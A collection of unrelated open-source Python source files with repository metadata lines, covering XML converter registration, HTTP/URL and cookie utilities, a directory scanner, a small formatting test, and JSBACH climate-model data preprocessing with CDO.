self.getSchemas()[rootattr.get('version','')] = fullpath
self.packagedvaluesnames.add(rootattr.get('packagedvaluesname','values.xml'))
#self.getSchemas()[basename] = fullpath
def addConverters(self,dirpath):
assert os.path.isdir(dirpath),'Provided path "%s" must be a directory.' % dirpath
#print 'Adding converters from "%s".' % dirpath
for name in os.listdir(dirpath):
fullpath = os.path.join(dirpath,name)
if name.endswith('.converter') and os.path.isfile(fullpath):
self.addConverterFromXml(fullpath)
def addDefaults(self,dirpath):
assert os.path.isdir(dirpath),'Provided path "%s" must be a directory.' % dirpath
for name in os.listdir(dirpath):
fullpath = os.path.join(dirpath,name)
if os.path.isfile(fullpath) and fullpath.endswith('.defaults'):
rootname,rootattr = util.getRootNodeInfo(fullpath)
self.getDefaults()[rootattr.get('version','')] = fullpath
def addConverterFromXml(self,xmlpath):
fw,bw = versioning.XmlConvertor.createClasses(xmlpath)
self.addConverter(fw)
if bw is not None: self.addConverter(bw)
def addConverter(self,convertorclass):
"""Registers the specified convertor class. The source and target version that
the convertor supports are part of the convertor class supplied, and are therefore
not specified explicitly.
"""
sourceid = convertorclass.fixedsourceid
targetid = convertorclass.fixedtargetid
assert sourceid is not None, 'Error! Specified convertor class lacks a source identifier.'
assert targetid is not None, 'Error! Specified convertor class lacks a target identifier.'
source2target = self.getConverters().setdefault(sourceid,{})
assert targetid not in source2target, 'Error! A class for converting from "%s" to "%s" was already specified previously.' % (sourceid,targetid)
source2target[targetid] = convertorclass
def hasConverter(self,sourceid,targetid):
"""Checks if a conversion route between the specified versions is available.
Both direct and indirect (via another version) routes are ok.
"""
return self.getConverter(sourceid,targetid) is not None
| BoldingBruggeman/gotm | gui.py/xmlstore/xmlstore.py | Python | gpl-2.0 | 127,433 |
import os
import re
import string
import mimetypes
from hashlib import sha1, md5
from uuid import uuid4
from io import BytesIO
from urllib import request as urllibr
from http import client as httpclient
from urllib.parse import quote, splitport
from http.cookiejar import CookieJar, Cookie
from http.cookies import SimpleCookie
from .structures import mapping_iterator
from .string import to_bytes, to_string
getproxies_environment = urllibr.getproxies_environment
ascii_letters = string.ascii_letters
HTTPError = urllibr.HTTPError
URLError = urllibr.URLError
parse_http_list = urllibr.parse_http_list
tls_schemes = ('https', 'wss')
# ################################################### URI & IRI SUFF
#
# The reserved URI characters (RFC 3986 - section 2.2)
# Default is charset is "iso-8859-1" (latin-1) from section 3.7.1
# http://www.ietf.org/rfc/rfc2616.txt
CHARSET = 'ISO-8859-1'
URI_GEN_DELIMS = frozenset(':/?#[]@')
URI_SUB_DELIMS = frozenset("!$&'()*+,;=")
URI_RESERVED_SET = URI_GEN_DELIMS.union(URI_SUB_DELIMS)
URI_RESERVED_CHARS = ''.join(URI_RESERVED_SET)
# The unreserved URI characters (RFC 3986 - section 2.3)
URI_UNRESERVED_SET = frozenset(ascii_letters + string.digits + '-._~')
URI_SAFE_CHARS = URI_RESERVED_CHARS + '%~'
HEADER_TOKEN_CHARS = frozenset("!#$%&'*+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
'^_`abcdefghijklmnopqrstuvwxyz|~')
MAX_CHUNK_SIZE = 65536
# ################################################### CONTENT TYPES
JSON_CONTENT_TYPES = ('application/json',
'application/javascript',
'text/json',
'text/x-json')
# ################################################### REQUEST METHODS
GET = 'GET'
DELETE = 'DELETE'
HEAD = 'HEAD'
OPTIONS = 'OPTIONS'
PATCH = 'PATCH'
POST = 'POST'
PUT = 'PUT'
TRACE = 'TRACE'
ENCODE_URL_METHODS = frozenset((DELETE, GET, HEAD, OPTIONS))
ENCODE_BODY_METHODS = frozenset((PATCH, POST, PUT, TRACE))
REDIRECT_CODES = (301, 302, 303, 305, 307)
NO_CONTENT_CODES = frozenset((204, 304))
CRLF = '\r\n'
LWS = '\r\n '
SEP = ': '
def escape(s):
return quote(s, safe='~')
def urlquote(iri):
return quote(iri, safe=URI_RESERVED_CHARS)
def _gen_unquote(uri):
unreserved_set = URI_UNRESERVED_SET
for n, part in enumerate(to_string(uri, 'latin1').split('%')):
if not n:
yield part
else:
h = part[0:2]
if len(h) == 2:
c = chr(int(h, 16))
if c in unreserved_set:
yield c + part[2:]
else:
yield '%' + part
else:
yield '%' + part
def unquote_unreserved(uri):
"""Un-escape any percent-escape sequences in a URI that are unreserved
characters. This leaves all reserved, illegal and non-ASCII bytes encoded."""
return ''.join(_gen_unquote(uri))
def requote_uri(uri):
"""Re-quote the given URI.
This function passes the given URI through an unquote/quote cycle to
ensure that it is fully and consistently quoted.
"""
# Unquote only the unreserved characters
# Then quote only illegal characters (do not quote reserved, unreserved,
# or '%')
return quote(unquote_unreserved(uri), safe=URI_SAFE_CHARS)
def iri_to_uri(iri, kwargs=None):
'''Convert an Internationalised Resource Identifier (IRI) portion
to a URI portion that is suitable for inclusion in a URL.
This is the algorithm from section 3.1 of RFC 3987.
Returns an ASCII native string containing the encoded result.
'''
if iri is None:
return iri
if kwargs:
iri = '%s?%s' % (to_string(iri, 'latin1'),
'&'.join(('%s=%s' % kv for kv in kwargs.items())))
return urlquote(unquote_unreserved(iri))
def host_and_port(host):
host, port = splitport(host)
return host, int(port) if port else None
def default_port(scheme):
if scheme in ("http", "ws"):
return '80'
elif scheme in ("https", "wss"):
return '443'
def host_and_port_default(scheme, host):
host, port = splitport(host)
if not port:
port = default_port(scheme)
return host, port
def host_no_default_port(scheme, netloc):
host, port = splitport(netloc)
if port and port == default_port(scheme):
return host
else:
return netloc
def get_hostport(scheme, full_host):
host, port = host_and_port(full_host)
if port is None:
i = host.rfind(':')
j = host.rfind(']') # ipv6 addresses have [...]
if i > j:
try:
port = int(host[i+1:])
except ValueError:
if host[i+1:] == "": # http://foo.com:/ == http://foo.com/
port = default_port(scheme)
else:
raise httpclient.InvalidURL("nonnumeric port: '%s'"
% host[i+1:])
host = host[:i]
else:
port = default_port(scheme)
if host and host[0] == '[' and host[-1] == ']':
host = host[1:-1]
return host, int(port)
def remove_double_slash(route):
if '//' in route:
route = re.sub('/+', '/', route)
return route
def is_succesful(status):
'''2xx status is succesful'''
return status >= 200 and status < 300
def split_comma(value):
return [v for v in (v.strip() for v in value.split(',')) if v]
def parse_cookies(value):
return [c.OutputString() for c in SimpleCookie(value).values()]
header_parsers = {'Connection': split_comma,
'Cookie': parse_cookies}
def quote_header_value(value, extra_chars='', allow_token=True):
"""Quote a header value if necessary.
:param value: the value to quote.
:param extra_chars: a list of extra characters to skip quoting.
:param allow_token: if this is enabled token values are returned
unchanged.
"""
value = to_string(value)
if allow_token:
token_chars = HEADER_TOKEN_CHARS | set(extra_chars)
if set(value).issubset(token_chars):
return value
return '"%s"' % value.replace('\\', '\\\\').replace('"', '\\"')
def unquote_header_value(value, is_filename=False):
"""Unquotes a header value.
Reversal of :func:`quote_header_value`. This does not use the real
un-quoting but what browsers are actually using for quoting.
:param value: the header value to unquote.
"""
if value and value[0] == value[-1] == '"':
# this is not the real unquoting, but fixing this so that the
# RFC is met will result in bugs with internet explorer and
# probably some other browsers as well. IE for example is
# uploading files with "C:\foo\bar.txt" as filename
value = value[1:-1]
# if this is a filename and the starting characters look like
# a UNC path, then just return the value without quotes. Using the
# replace sequence below on a UNC path has the effect of turning
# the leading double slash into a single slash and then
# _fix_ie_filename() doesn't work correctly. See #458.
if not is_filename or value[:2] != '\\\\':
return value.replace('\\\\', '\\').replace('\\"', '"')
return value
def parse_dict_header(value):
"""Parse lists of key, value pairs as described by RFC 2068 Section 2 and
convert them into a python dict:
>>> d = parse_dict_header('foo="is a fish", bar="as well"')
>>> type(d) is dict
True
>>> sorted(d.items())
[('bar', 'as well'), ('foo', 'is a fish')]
If there is no value for a key it will be `None`:
>>> parse_dict_header('key_without_value')
{'key_without_value': None}
To create a header from the :class:`dict` again, use the
:func:`dump_header` function.
:param value: a string with a dict header.
:return: :class:`dict`
"""
result = {}
for item in parse_http_list(value):
if '=' not in item:
result[item] = None
continue
name, value = item.split('=', 1)
if value[:1] == value[-1:] == '"':
value = unquote_header_value(value[1:-1])
result[name] = value
return result
_special = re.escape('()<>@,;:\\"/[]?={} \t')
_re_special = re.compile('[%s]' % _special)
_qstr = '"(?:\\\\.|[^"])*"' # Quoted string
_value = '(?:[^%s]+|%s)' % (_special, _qstr) # Save or quoted string
_option = '(?:;|^)\s*([^%s]+)\s*=\s*(%s)' % (_special, _value)
_re_option = re.compile(_option) # key=value part of an Content-Type header
def header_unquote(val, filename=False):
if val[0] == val[-1] == '"':
val = val[1:-1]
if val[1:3] == ':\\' or val[:2] == '\\\\':
val = val.split('\\')[-1] # fix ie6 bug: full path --> filename
return val.replace('\\\\', '\\').replace('\\"', '"')
return val
def parse_options_header(header, options=None):
if ';' not in header:
return header.lower().strip(), {}
ctype, tail = header.split(';', 1)
options = options or {}
for match in _re_option.finditer(tail):
key = match.group(1).lower()
value = header_unquote(match.group(2), key == 'filename')
options[key] = value
return ctype, options
# ############################################ UTILITIES, ENCODERS, PARSERS
absolute_http_url_re = re.compile(r"^https?://", re.I)
def is_absolute_uri(location):
'''Check if a ``location`` is absolute, i.e. it includes the scheme
'''
return location and absolute_http_url_re.match(location)
def get_environ_proxies():
"""Return a dict of environment proxies. From requests_."""
proxy_keys = [
'all',
'http',
'https',
'ftp',
'socks',
'ws',
'wss',
'no'
]
def get_proxy(k):
return os.environ.get(k) or os.environ.get(k.upper())
proxies = [(key, get_proxy(key + '_proxy')) for key in proxy_keys]
return dict([(key, val) for (key, val) in proxies if val])
def appendslash(url):
'''Append a slash to *url* if it does not have one.'''
if not url.endswith('/'):
url = '%s/' % url
return url
def choose_boundary():
"""Our embarassingly-simple replacement for mimetools.choose_boundary."""
return uuid4().hex
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def encode_multipart_formdata(fields, boundary=None, charset=None):
"""Encode a dictionary of ``fields`` using the multipart/form-data format.
:param fields:
Dictionary of fields or list of (key, value) field tuples. The key is
treated as the field name, and the value as the body of the form-data
bytes. If the value is a tuple of two elements, then the first element
is treated as the filename of the form-data section.
Field names and filenames must be unicode.
:param boundary:
If not specified, then a random boundary will be generated using
:func:`mimetools.choose_boundary`.
"""
charset = charset or 'utf-8'
body = BytesIO()
if boundary is None:
boundary = choose_boundary()
for fieldname, value in mapping_iterator(fields):
body.write(('--%s\r\n' % boundary).encode(charset))
if isinstance(value, tuple):
filename, data = value
body.write(('Content-Disposition: form-data; name="%s"; '
'filename="%s"\r\n' % (fieldname, filename))
.encode(charset))
body.write(('Content-Type: %s\r\n\r\n' %
(get_content_type(filename))).encode(charset))
else:
data = value
body.write(('Content-Disposition: form-data; name="%s"\r\n'
% (fieldname)).encode(charset))
body.write(b'Content-Type: text/plain\r\n\r\n')
body.write(to_bytes(data))
body.write(b'\r\n')
body.write(('--%s--\r\n' % (boundary)).encode(charset))
content_type = 'multipart/form-data; boundary=%s' % boundary
return body.getvalue(), content_type
def hexmd5(x):
return md5(to_bytes(x)).hexdigest()
def hexsha1(x):
return sha1(to_bytes(x)).hexdigest()
# ################################################################# COOKIES
def create_cookie(name, value, **kwargs):
"""Make a cookie from underspecified parameters.
By default, the pair of `name` and `value` will be set for the domain ''
and sent on every request (this is sometimes called a "supercookie").
"""
result = dict(
version=0,
name=name,
value=value,
port=None,
domain='',
path='/',
secure=False,
expires=None,
discard=True,
comment=None,
comment_url=None,
rest={'HttpOnly': None},
rfc2109=False,)
badargs = set(kwargs) - set(result)
if badargs:
err = 'create_cookie() got unexpected keyword arguments: %s'
raise TypeError(err % list(badargs))
result.update(kwargs)
result['port_specified'] = bool(result['port'])
result['domain_specified'] = bool(result['domain'])
result['domain_initial_dot'] = result['domain'].startswith('.')
result['path_specified'] = bool(result['path'])
return Cookie(**result)
def cookiejar_from_dict(*cookie_dicts):
"""Returns a CookieJar from a key/value dictionary.
:param cookie_dict: Dict of key/values to insert into CookieJar.
"""
cookie_dicts = tuple((d for d in cookie_dicts if d))
if len(cookie_dicts) == 1 and isinstance(cookie_dicts[0], CookieJar):
return cookie_dicts[0]
cookiejar = CookieJar()
for cookie_dict in cookie_dicts:
if isinstance(cookie_dict, CookieJar):
for cookie in cookie_dict:
cookiejar.set_cookie(cookie)
else:
for name in cookie_dict:
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
return cookiejar
# ################################################################# VARY HEADER
cc_delim_re = re.compile(r'\s*,\s*')
def patch_vary_headers(response, newheaders):
"""Adds (or updates) the "Vary" header in the given HttpResponse object.
newheaders is a list of header names that should be in "Vary". Existing
headers in "Vary" aren't removed.
For information on the Vary header, see:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.44
"""
# Note that we need to keep the original order intact, because cache
# implementations may rely on the order of the Vary contents in, say,
# computing an MD5 hash.
if 'Vary' in response:
vary_headers = cc_delim_re.split(response['Vary'])
else:
vary_headers = []
# Use .lower() here so we treat headers as case-insensitive.
existing_headers = set([header.lower() for header in vary_headers])
additional_headers = [newheader for newheader in newheaders
if newheader.lower() not in existing_headers]
response['Vary'] = ', '.join(vary_headers + additional_headers)
def has_vary_header(response, header_query):
"""
Checks to see if the response has a given header name in its Vary header.
"""
if not response.has_header('Vary'):
return False
vary_headers = cc_delim_re.split(response['Vary'])
existing_headers = set([header.lower() for header in vary_headers])
return header_query.lower() in existing_headers
class CacheControl:
'''
http://www.mnot.net/cache_docs/
.. attribute:: maxage
Specifies the maximum amount of time that a representation will be
considered fresh.
'''
def __init__(self, maxage=None, private=False,
must_revalidate=False, proxy_revalidate=False,
nostore=False):
self.maxage = maxage
self.private = private
self.must_revalidate = must_revalidate
self.proxy_revalidate = proxy_revalidate
self.nostore = nostore
def __call__(self, headers, etag=None):
if self.nostore:
headers['cache-control'] = ('no-store, no-cache, must-revalidate,'
' max-age=0')
elif self.maxage:
headers['cache-control'] = 'max-age=%s' % self.maxage
if etag:
headers['etag'] = '"%s"' % etag
if self.private:
headers.add('cache-control', 'private')
else:
headers.add('cache-control', 'public')
if self.must_revalidate:
headers.add('cache-control', 'must-revalidate')
elif self.proxy_revalidate:
headers.add('cache-control', 'proxy-revalidate')
else:
headers['cache-control'] = 'no-cache'
return headers
def chunk_encoding(chunk):
'''Write a chunk::
chunk-size(hex) CRLF
chunk-data CRLF
If the size is 0, this is the last chunk, and an extra CRLF is appended.
'''
head = ("%X\r\n" % len(chunk)).encode('utf-8')
return head + chunk + b'\r\n'
def http_chunks(data, finish=False):
while len(data) >= MAX_CHUNK_SIZE:
chunk, data = data[:MAX_CHUNK_SIZE], data[MAX_CHUNK_SIZE:]
yield chunk_encoding(chunk)
if data:
yield chunk_encoding(data)
if finish:
yield chunk_encoding(data)
def parse_header_links(value):
"""Return a dict of parsed link headers proxies
i.e. Link: <http:/.../front.jpeg>; rel=front; type="image/jpeg",
<http://.../back.jpeg>; rel=back;type="image/jpeg"
Original code from https://github.com/kennethreitz/requests
Copyright 2016 Kenneth Reitz
"""
links = []
replace_chars = " '\""
for val in re.split(", *<", value):
try:
url, params = val.split(";", 1)
except ValueError:
url, params = val, ''
link = {}
link["url"] = url.strip("<> '\"")
for param in params.split(";"):
try:
key, value = param.split("=")
except ValueError:
break
link[key.strip(replace_chars)] = value.strip(replace_chars)
links.append(link)
return links
| quantmind/pulsar | pulsar/utils/httpurl.py | Python | bsd-3-clause | 18,331 |
# Copyright 2008-2009 Dan Collins
#
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# And is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Build; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os
from numpy import size,unique
from pdf2py import header
def run():
stage = os.environ['STAGE']
home = os.environ['HOME']
vistadir = os.environ['vistadir']
#path = stage+'/data/'
x=os.walk(vistadir+'/')
dbdirs = x.next()[1]
return dbdirs
| badbytes/pymeg | mswtools/vistadbscan.py | Python | gpl-3.0 | 1,005 |
#!/usr/bin/env python3
"""
Created on 10 Dec 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from scs_core.data.str import Str
# --------------------------------------------------------------------------------------------------------------------
value = {"a": 1, "b": 2}
print(Str.collection(value))
print("-")
value = [1, 2, 3]
print(Str.collection(value))
print("-")
value = (1, 2, 3)
print(Str.collection(value))
print("-")
value = [1, {"a": 1, "b": [1, {"a": 1, "b": 2}, 3]}, 3]
print(Str.collection(value))
| south-coast-science/scs_core | tests/data/datum_format_test.py | Python | mit | 541 |
# -*- coding: utf-8 -*-
#
# © 2014 Ian Eure
# Author: Ian Eure <ian.eure@gmail.com>
#
| ieure/yar | yar/devices/__init__.py | Python | bsd-3-clause | 87 |
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
class JSBACH_BOT(Model):
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, **kwargs):
super(JSBACH_BOT, self).__init__(filename, dic_variables, name=name, **kwargs)
self.experiment = experiment
self.shift_lon = shift_lon
self.type = 'JSBACH_BOT'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
@return: string with unique combination of models and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_albedo_data(self, interval='season'):
"""
get albedo data for JSBACH
returns Data object
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
v = 'var176'
filename = self.data_dir + 'data/model1/' + self.experiment + '_echam6_BOT_mm_1979-2006_albedo_yseasmean.nc'
ls_mask = get_T63_landseamask(self.shift_lon)
albedo = Data(filename, v, read=True,
label='MPI-ESM albedo ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
return albedo
def get_tree_fraction(self, interval='season'):
"""
todo implement this for data from a real run !!!
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
ls_mask = get_T63_landseamask(self.shift_lon)
filename = '/home/m300028/shared/dev/svn/trstools-0.0.1/lib/python/pyCMBS/framework/external/vegetation_benchmarking/VEGETATION_COVER_BENCHMARKING/example/historical_r1i1p1-LR_1850-2005_forest_shrub.nc'
v = 'var12'
tree = Data(filename, v, read=True,
label='MPI-ESM tree fraction ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data, start_time=pl.num2date(pl.datestr2num('2001-01-01')), stop_time=pl.num2date(pl.datestr2num('2001-12-31')))
return tree
def get_grass_fraction(self, interval='season'):
"""
todo implement this for data from a real run !!!
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
ls_mask = get_T63_landseamask(self.shift_lon)
filename = '/home/m300028/shared/dev/svn/trstools-0.0.1/lib/python/pyCMBS/framework/external/vegetation_benchmarking/VEGETATION_COVER_BENCHMARKING/example/historical_r1i1p1-LR_1850-2005_grass_crop_pasture_2001.nc'
v = 'var12'
grass = Data(filename, v, read=True,
label='MPI-ESM tree fraction ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
#shift_lon=shift_lon,
mask=ls_mask.data.data, start_time=pl.num2date(pl.datestr2num('2001-01-01')), stop_time=pl.num2date(pl.datestr2num('2001-12-31')), squeeze=True)
return grass
def get_surface_shortwave_radiation_down(self, interval='season'):
"""
get surface shortwave incoming radiation data for JSBACH
returns Data object
"""
if interval != 'season':
raise ValueError('Other temporal sampling than SEASON not supported yet for JSBACH BOT files, sorry')
v = 'var176'
y1 = '1979-01-01'
y2 = '2006-12-31'
rawfilename = self.data_dir + 'data/model/' + self.experiment + '_echam6_BOT_mm_1979-2006_srads.nc'
if not os.path.exists(rawfilename):
return None
#--- read data
cdo = pyCDO(rawfilename, y1, y2)
if interval == 'season':
seasfile = cdo.seasmean()
del cdo
print 'seasfile: ', seasfile
cdo = pyCDO(seasfile, y1, y2)
filename = cdo.yseasmean()
else:
raise ValueError('Invalid interval option %s ' % interval)
#--- read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#--- read SIS data
sis = Data(filename, v, read=True,
label='MPI-ESM SIS ' + self.experiment, unit='-', lat_name='lat', lon_name='lon',
#shift_lon=shift_lon,
mask=ls_mask.data.data)
return sis
def get_rainfall_data(self, interval='season'):
"""
get rainfall data for JSBACH
returns Data object
"""
if interval == 'season':
pass
else:
raise ValueError('Invalid value for interval: %s' % interval)
#/// PREPROCESSING: seasonal means ///
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
filename1 = self.data_dir + self.experiment + '_echam6_BOT_mm_1980_sel.nc'
tmp = pyCDO(filename1, s_start_time, s_stop_time).seldate()
tmp1 = pyCDO(tmp, s_start_time, s_stop_time).seasmean()
filename = pyCDO(tmp1, s_start_time, s_stop_time).yseasmean()
#/// READ DATA ///
#1) land / sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#2) precipitation data
try:
v = 'var4'
rain = Data(filename, v, read=True, scale_factor=86400.,
label='MPI-ESM ' + self.experiment, unit='mm/day', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
except:
v = 'var142'
rain = Data(filename, v, read=True, scale_factor=86400.,
label='MPI-ESM ' + self.experiment, unit='mm/day', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data)
return rain
class JSBACH_RAW2(Model):
"""
Class for RAW JSBACH model output
works on the real raw output
"""
#def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, model_dict=None, input_format='grb', raw_outdata='outdata/jsbach/', **kwargs):
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, input_format='grb', raw_outdata='outdata/jsbach/', **kwargs):
"""
The assignment of certain variables to different input streams is done in the routine
get_jsbach_data_generic()
Parameters
----------
input_format : str
specifies file format of input data
['nc','grb']
"""
super(JSBACH_RAW2, self).__init__(filename, dic_variables, name=name, **kwargs)
self.experiment = experiment
self.shift_lon = shift_lon
#self.get_data()
self.type = 'JSBACH_RAW2'
self.input_format = input_format
assert self.input_format in ['nc', 'grb']
self.raw_outdata = raw_outdata
self._unique_name = self._get_unique_name()
# do preprocessing of streams (only needed once!) ---
self.files = {}
self._preproc_streams()
#~ self.model_dict = copy.deepcopy(model_dict)
self.model = 'JSBACH'
def _get_filenames_jsbach_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_main_mm_*.' + self.input_format
def _get_filenames_veg_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_veg_mm_*.' + self.input_format
def _get_filenames_land_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_land_mm_*.' + self.input_format
def _get_filenames_surf_stream(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_surf_mm_*.' + self.input_format
def _get_filenames_albedo_VIS(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_mm_*_VIS_albedo.' + self.input_format
def _get_filenames_albedo_NIR(self):
return self.data_dir + self.raw_outdata + self.experiment + '_jsbach_mm_*_NIR_albedo.' + self.input_format
def _get_filenames_echam_BOT(self):
return self.data_dir + self.raw_outdata + '../echam6/' + self.experiment + '_echam6_BOT_mm_*.sz'
def _preproc_streams(self):
"""
It is assumed that the standard JSBACH postprocessing scripts have been applied.
Thus monthly mean data is available for each stream and code tables still need to be applied.
This routine does the following:
1) merge all times from individual (monthly mean) output files
2) assign codetables to work with proper variable names
3) aggregate data from tiles to gridbox values
"""
print 'Preprocessing JSBACH raw data streams (may take a while) ...'
cdo = Cdo()
# jsbach stream
print ' JSBACH stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_', dir=get_temporary_directory()) # temporary file
#~ print self.data_dir
#~ print self.raw_outdata
#~ print 'Files: ', self._get_filenames_jsbach_stream()
#~ stop
if len(glob.glob(self._get_filenames_jsbach_stream())) > 0: # check if input files existing at all
print 'Mering the following files:', self._get_filenames_jsbach_stream()
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_jsbach_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
print 'Outfile: ', outfile
#~ os.remove(tmp)
print 'Temporary name: ', tmp
self.files.update({'jsbach': outfile})
# veg stream
print ' VEG stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_veg_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_veg.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_veg_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_veg_stream())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_veg_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'veg': outfile})
# veg land
print ' LAND stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_land_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_land.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_land_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_land_stream())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_land_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'land': outfile})
# surf stream
print ' SURF stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_surf_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_jsbach_surf.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_jsbach_surf_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_surf_stream())) > 0: # check if input files existing at all
print glob.glob(self._get_filenames_surf_stream())
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_surf_stream())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'surf': outfile})
# ECHAM BOT stream
print ' BOT stream ...'
outfile = get_temporary_directory() + self.experiment + '_echam6_echam_mm_full.nc'
if os.path.exists(outfile):
pass
else:
codetable = self.data_dir + 'log/' + self.experiment + '_echam6_echam.codes'
tmp = tempfile.mktemp(suffix='.nc', prefix=self.experiment + '_echam6_echam_', dir=get_temporary_directory()) # temporary file
if len(glob.glob(self._get_filenames_echam_BOT())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=tmp, input=self._get_filenames_echam_BOT())
if os.path.exists(codetable):
cdo.monmean(options='-f nc', output=outfile, input='-setpartab,' + codetable + ' ' + tmp) # monmean needed here, as otherwise interface does not work
else:
cdo.monmean(options='-f nc', output=outfile, input=tmp) # monmean needed here, as otherwise interface does not work
os.remove(tmp)
self.files.update({'echam': outfile})
# ALBEDO file
# albedo files as preprocessed by a script of Thomas
print ' ALBEDO VIS stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_VIS_albedo_mm_full.nc'
if os.path.exists(outfile):
pass
else:
if len(glob.glob(self._get_filenames_albedo_VIS())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=outfile, input=self._get_filenames_albedo_VIS())
self.files.update({'albedo_vis': outfile})
print ' ALBEDO NIR stream ...'
outfile = get_temporary_directory() + self.experiment + '_jsbach_NIR_albedo_mm_full.nc'
if os.path.exists(outfile):
pass
else:
if len(glob.glob(self._get_filenames_albedo_NIR())) > 0: # check if input files existing at all
cdo.mergetime(options='-f nc', output=outfile, input=self._get_filenames_albedo_NIR())
self.files.update({'albedo_nir': outfile})
def _get_unique_name(self):
"""
get unique name from model and experiment
@return: string with unique combination of models and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_albedo_data(self, interval='season'):
"""
calculate albedo as ratio of upward and downwelling fluxes
first the monthly mean fluxes are used to calculate the albedo,
This routine uses the definitions of the routines how to
read upward and downward fluxes
"""
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#~ tmpdict = copy.deepcopy(kwargs)
#~ print self.dic_vars
routine_up = self.dic_vars['surface_upward_flux']
